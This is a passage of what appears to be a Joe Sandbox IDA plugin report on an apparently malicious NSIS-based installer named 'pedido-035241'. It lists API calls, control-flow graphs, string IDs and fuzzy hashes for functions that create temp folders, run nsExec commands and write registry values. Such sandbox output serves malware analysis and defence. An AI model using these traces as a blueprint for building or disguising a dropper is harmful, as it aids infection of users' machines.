• lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Directory$SystemWindowslstrcatlstrlen
• String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 4260037668-905382516

Control-flow Graph: function starting at 0040176F (graph image not preserved; basic blocks were marked Executed / Not Executed)
APIs
• lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene,?,?,00000031), ref: 004017B0
• CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene,?,?,00000031), ref: 004017D5
  • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
  • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
  • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
  • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene$C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dll$ExecToStack
                                                                                                                                                                            • API String ID: 1941528284-1436347379
                                                                                                                                                                            • Opcode ID: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                            • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                                                                                                                                            • Opcode Fuzzy Hash: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                            • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 630 405569-40557e 631 405584-405595 630->631 632 405635-405639 630->632 633 4055a0-4055ac lstrlenW 631->633 634 405597-40559b call 406544 631->634 636 4055c9-4055cd 633->636 637 4055ae-4055be lstrlenW 633->637 634->633 639 4055dc-4055e0 636->639 640 4055cf-4055d6 SetWindowTextW 636->640 637->632 638 4055c0-4055c4 lstrcatW 637->638 638->636 641 4055e2-405624 SendMessageW * 3 639->641 642 405626-405628 639->642 640->639 641->642 642->632 643 40562a-40562d 642->643 643->632
APIs
• lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
• lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
• lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
• SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
• SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
  • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
  • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: MessageSendlstrlen$lstrcat$TextWindow
• String ID: Completed
• API String ID: 1495540970-3087654605
• Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
• Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
• Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
• Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 644 4032b4-4032cb 645 4032d4-4032dc 644->645 646 4032cd 644->646 647 4032e3-4032e8 645->647 648 4032de 645->648 646->645 649 4032f8-403305 call 403499 647->649 650 4032ea-4032f3 call 4034af 647->650 648->647 654 403450 649->654 655 40330b-40330f 649->655 650->649 658 403452-403453 654->658 656 403315-403335 GetTickCount call 406a2f 655->656 657 403439-40343b 655->657 668 40348f 656->668 670 40333b-403343 656->670 659 403484-403488 657->659 660 40343d-403440 657->660 662 403492-403496 658->662 663 403455-40345b 659->663 664 40348a 659->664 665 403442 660->665 666 403445-40344e call 403499 660->666 671 403460-40346e call 403499 663->671 672 40345d 663->672 664->668 665->666 666->654 677 40348c 666->677 668->662 674 403345 670->674 675 403348-403356 call 403499 670->675 671->654 680 403470-40347c call 4060a9 671->680 672->671 674->675 675->654 683 40335c-403365 675->683 677->668 686 403435-403437 680->686 687 40347e-403481 680->687 685 40336b-403388 call 406a4f 683->685 690 403431-403433 685->690 691 40338e-4033a5 GetTickCount 685->691 686->658 687->659 690->658 692 4033f0-4033f2 691->692 693 4033a7-4033af 691->693 696 4033f4-4033f8 692->696 697 403425-403429 692->697 694 4033b1-4033b5 693->694 695 4033b7-4033e8 MulDiv wsprintfW call 405569 693->695 694->692 694->695 702 4033ed 695->702 700 4033fa-4033ff call 4060a9 696->700 701 40340d-403413 696->701 697->670 698 40342f 697->698 698->668 705 403404-403406 700->705 704 403419-40341d 701->704 702->692 704->685 706 403423 704->706 705->686 707 403408-40340b 705->707 706->668 707->704
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: ... %d%%$G8@
• API String ID: 551687249-649311722
• Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
• Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
• Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
• Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 708 406864-406884 GetSystemDirectoryW 709 406886 708->709 710 406888-40688a 708->710 709->710 711 40689b-40689d 710->711 712 40688c-406895 710->712 714 40689e-4068d1 wsprintfW LoadLibraryExW 711->714 712->711 713 406897-406899 712->713 713->714
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
• wsprintfW.USER32 ref: 004068B6
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME$\
• API String ID: 2200240437-1946221925
• Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
• Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
• Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
• Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 715 405a38-405a83 CreateDirectoryW 716 405a85-405a87 715->716 717 405a89-405a96 GetLastError 715->717 718 405ab0-405ab2 716->718 717->718 719 405a98-405aac SetFileSecurityW 717->719 719->716 720 405aae GetLastError 719->720 720->718
APIs
• CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
• GetLastError.KERNEL32 ref: 00405A8F
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
• GetLastError.KERNEL32 ref: 00405AAE
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 3449924974-3081826266
                                                                                                                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                            • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                            • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Control-flow Graph

control_flow_graph 721 406026-406032 722 406033-406067 GetTickCount GetTempFileNameW 721->722 723 406076-406078 722->723 724 406069-40606b 722->724 725 406070-406073 723->725 724->722 726 40606d 724->726 726->725
APIs
• GetTickCount.KERNEL32 ref: 00406044
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-678247507
• Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
• Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
• Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
• Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

Control-flow Graph

control_flow_graph 810 4015c1-4015d5 call 402da6 call 405e81 815 401631-401634 810->815 816 4015d7-4015ea call 405e03 810->816 818 401663-4022f6 call 401423 815->818 819 401636-401655 call 401423 call 406507 SetCurrentDirectoryW 815->819 824 401604-401607 call 405ab5 816->824 825 4015ec-4015ef 816->825 834 402c2a-402c39 818->834 835 40292e-402935 818->835 819->834 837 40165b-40165e 819->837 833 40160c-40160e 824->833 825->824 830 4015f1-4015f8 call 405ad2 825->830 830->824 841 4015fa-4015fd call 405a38 830->841 839 401610-401615 833->839 840 401627-40162f 833->840 835->834 837->834 843 401624 839->843 844 401617-401622 GetFileAttributesW 839->844 840->815 840->816 846 401602 841->846 843->840 844->840 844->843 846->833
APIs
  • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
  • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene,?,00000000,000000F0), ref: 0040164D
Strings
• C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene, xrefs: 00401640
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene
• API String ID: 1892508949-4197813180
• Opcode ID: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
• Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
• Opcode Fuzzy Hash: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
• Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
APIs
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
• RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: : Completed
• API String ID: 3356406503-2954849223
• Opcode ID: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
• Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
• Opcode Fuzzy Hash: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
• Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
• Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
• Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
• Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
• Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
• Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
• Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Opcode ID: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
• Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
• Opcode Fuzzy Hash: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
• Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401C0B
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
  • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
  • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Global$AllocFreelstrcatlstrlen
• String ID: ExecToStack
• API String ID: 3292104215-166031814
• Opcode ID: 3068f9b91c3f4162d0930761ac5c94cf9212319f1563e24b4ffc4f3e6270dea2
• Instruction ID: e925a152a6e0f7021576dd296752ea90fe74f89098b2d6bde03e837448aacd47
• Opcode Fuzzy Hash: 3068f9b91c3f4162d0930761ac5c94cf9212319f1563e24b4ffc4f3e6270dea2
• Instruction Fuzzy Hash: BA213673904210EBD720AFA4DEC5E5E72A4EB08328715093BF552B72D1D6BCE8518B5D
APIs
• lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024D5
• RegSetValueExW.KERNELBASE(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402515
• RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CloseValuelstrlen
• String ID:
• API String ID: 2655323295-0
• Opcode ID: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
• Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
• Opcode Fuzzy Hash: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
• Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
• RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Enum$CloseValue
• String ID:
• API String ID: 397863658-0
• Opcode ID: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
• Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
• Opcode Fuzzy Hash: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
• Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D
APIs
• RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
• RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
